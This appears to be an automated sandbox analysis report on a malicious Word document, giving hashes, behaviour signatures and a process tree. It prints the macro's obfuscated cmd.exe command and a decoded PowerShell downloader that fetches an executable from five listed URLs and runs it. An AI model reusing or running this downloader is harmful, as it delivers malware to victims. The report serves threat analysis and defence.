Analysis
-
max time kernel
101s -
max time network
123s -
platform
windows10-2004_x64 -
resource
win10v2004-20240426-en -
resource tags
arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system -
submitted
26-05-2024 21:49
Behavioral task
behavioral1
Sample
76e3f55356e2a30593d436ab0880eff8_JaffaCakes118.doc
Resource
win7-20240508-en
Behavioral task
behavioral2
Sample
76e3f55356e2a30593d436ab0880eff8_JaffaCakes118.doc
Resource
win10v2004-20240426-en
General
-
Target
76e3f55356e2a30593d436ab0880eff8_JaffaCakes118.doc
-
Size
113KB
-
MD5
76e3f55356e2a30593d436ab0880eff8
-
SHA1
6b1725b71bf2f01ca5b6b7f4c2b4252c67a6e2b1
-
SHA256
b76296d33b324195937257e98ff545fa525399c3f54ec9ed090e29a09ea87e5e
-
SHA512
6d4e48af3634cea0c8f729a171c51b65cb8b9755cf173867cf201a6934a771a315cb3540c0bcd5f47a58ca200fa0d05a052fbf1313717debb7ca5ccf192cfa8c
-
SSDEEP
1536:0TxjwKZ09cB7y9ghN8+mQ90MTT+aU1E0NpFukKH6FH:4xjnB29gb8on+E0NpFEaFH
Malware Config
Extracted
http://baza-shartash.ru/hkqXqT1
http://anapapoliv.ru/Sp4na
http://shorecrestschools.com/nnQkN
http://comicole.com/2HZ
http://elartedelaaccion.es/6Hyl
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process 2196 3160 Cmd.exe 80 -
Blocklisted process makes network request 6 IoCs
flow pid Process 25 3436 powershell.exe 27 3436 powershell.exe 28 3436 powershell.exe 31 3436 powershell.exe 33 3436 powershell.exe 37 3436 powershell.exe -
An obfuscated cmd.exe command-line is typically used to evade detection. 1 IoCs
pid Process 2196 Cmd.exe -
pid Process 3436 powershell.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
pid Process 3160 WINWORD.EXE 3160 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 3436 powershell.exe 3436 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 3436 powershell.exe -
Suspicious use of SetWindowsHookEx 7 IoCs
pid Process 3160 WINWORD.EXE 3160 WINWORD.EXE 3160 WINWORD.EXE 3160 WINWORD.EXE 3160 WINWORD.EXE 3160 WINWORD.EXE 3160 WINWORD.EXE -
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 3160 wrote to memory of 2196 3160 WINWORD.EXE 85 PID 3160 wrote to memory of 2196 3160 WINWORD.EXE 85 PID 2196 wrote to memory of 3436 2196 Cmd.exe 91 PID 2196 wrote to memory of 3436 2196 Cmd.exe 91
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\76e3f55356e2a30593d436ab0880eff8_JaffaCakes118.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3160 -
C:\Windows\SYSTEM32\Cmd.exeCmd /V:O/C"set - =IdBSZaVlEVEJwpRGpMcXUSahlErhlBwsz 7+Wi;mN9qC.@,\Pk}tQb'j26=oT)fDy:/nue{F4Hv1$(-x&&for %o in (16,59,30,69,26,31,27,69,28,28,33,76,53,37,59,58,67,69,30,78,59,53,55,69,18,51,33,40,69,51,44,36,69,53,43,28,37,69,67,51,38,76,26,67,9,58,54,27,51,51,16,65,66,66,53,22,32,22,78,31,27,22,26,51,22,31,27,44,26,68,66,27,49,42,19,42,60,75,45,27,51,51,16,65,66,66,22,67,22,16,22,16,59,28,37,74,44,26,68,66,21,16,72,67,22,45,27,51,51,16,65,66,66,31,27,59,26,69,18,26,69,31,51,31,18,27,59,59,28,31,44,18,59,39,66,67,67,52,49,40,45,27,51,51,16,65,66,66,18,59,39,37,18,59,28,69,44,18,59,39,66,56,73,4,45,27,51,51,16,65,66,66,69,28,22,26,51,69,1,69,28,22,22,18,18,37,59,67,44,69,31,66,57,73,64,28,54,44,21,16,28,37,51,77,54,45,54,61,38,76,68,42,43,33,58,33,54,75,34,41,54,38,76,68,31,51,58,76,69,67,74,65,51,69,39,16,35,54,47,54,35,76,68,42,43,35,54,44,69,79,69,54,38,62,59,26,69,22,18,27,77,76,67,25,14,33,37,67,33,76,26,67,9,61,70,51,26,64,70,76,53,37,59,44,63,59,30,67,28,59,22,1,71,37,28,69,77,76,67,25,14,46,33,76,68,31,51,61,38,21,51,22,26,51,78,48,26,59,18,69,31,31,33,76,68,31,51,38,53,26,69,22,49,38,50,18,22,51,18,27,70,50,50,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,88)do set ] =!] !!- :~%o,1!&&if %o==88 call %] :~-360%"2⤵
- Process spawned unexpected child process
- An obfuscated cmd.exe command-line is typically used to evade detection.
- Suspicious use of WriteProcessMemory
PID:2196 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell $bio=new-object Net.WebClient;$rnV='http://baza-shartash.ru/hkqXqT1@http://anapapoliv.ru/Sp4na@http://shorecrestschools.com/nnQkN@http://comicole.com/2HZ@http://elartedelaaccion.es/6Hyl'.Split('@');$uqC = '179';$ust=$env:temp+'\'+$uqC+'.exe';foreach($nER in $rnV){try{$bio.DownloadFile($nER, $ust);Start-Process $ust;break;}catch{}}3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3436
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
36KB
MD541d9f8321bbd35aaf891f3b7bac060df
SHA158da7c06501159f4c7b909d59abc23152e8372ad
SHA25629457444b7268825b17399a00ce19fcd9ecd6647b936f229c8ca2bb35ea4ca64
SHA5125a23e2e3bd6713d0a66eb8ca74ac5ae878c549e20eb1d18423d7afa739d431685ebe0f66a8bf730c7b8188baaaedebe321294269de3e35e6b91bd07189803960
-
Filesize
263KB
MD5ff0e07eff1333cdf9fc2523d323dd654
SHA177a1ae0dd8dbc3fee65dd6266f31e2a564d088a4
SHA2563f925e0cc1542f09de1f99060899eafb0042bb9682507c907173c392115a44b5
SHA512b4615f995fab87661c2dbe46625aa982215d7bde27cafae221dca76087fe76da4b4a381943436fcac1577cb3d260d0050b32b7b93e3eb07912494429f126bb3d
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82